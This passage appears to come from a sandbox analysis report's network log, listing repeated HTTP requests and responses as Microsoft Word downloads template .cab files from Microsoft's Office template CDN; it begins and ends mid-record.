      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851219.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31605
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC8822FFB6E
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 550906
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
      Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
      ETag: 0x8D60DDC2BE7DF3C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0414ccae-601e-0011-165a-b9109e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851218.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31835
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC881E66CE5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 698244
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
      Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
      ETag: 0x8D60DDB6CAEA91D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d7c59a99-101e-0021-318b-c7a43e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851220.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31482
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC8827914A7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03998159.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 3417042
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
      Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
      ETag: 0x8D36AC8BD7E1FE9
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851221.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31562
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC882C4ED43
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1097591
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
      Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
      ETag: 0x8D60DDB7EAA50F0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4b5a1384-701e-0032-6dfb-b98a5d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851222.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 28911
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: bXh7HiI9trkbaSOAYsyocg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC8830E54C8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 230916
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
      Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
      ETag: 0x8D5E78DC0BDFFD8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b597281b-e01e-00c0-4097-a0b22d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851223.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 32833
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC88357BC32
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1766185
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: go+WAx9Av468teUqrut+TA==
      Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
      ETag: 0x8D60DDC4354B7FB
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: a3240f77-901e-0000-474a-3a8045000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851225.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883F49D7D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851224.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 30957
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 08kDbk4RWegysbTS6dQr8A==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883A171B7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851227.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31471
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: karb7EFxz6gpK2GEkvXvNA==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC8848A0495
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1310275
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
      Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
      ETag: 0x8D60DDBA5EDDA1A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ef258b2c-c01e-001b-4d97-a016fb000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 307348
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
      Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
      ETag: 0x8D60DDC169CBCB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 875b64ee-b01e-0079-1097-a05123000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851226.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 35519
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC88440C433
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 723359
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
      Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
      ETag: 0x8D60DDB43B59EC5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328884.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC8987823BE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f3206081-b01e-0002-7f97-a03492000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328905.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20457
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
      Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
      ETag: 0x8D36AC886167DDF
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
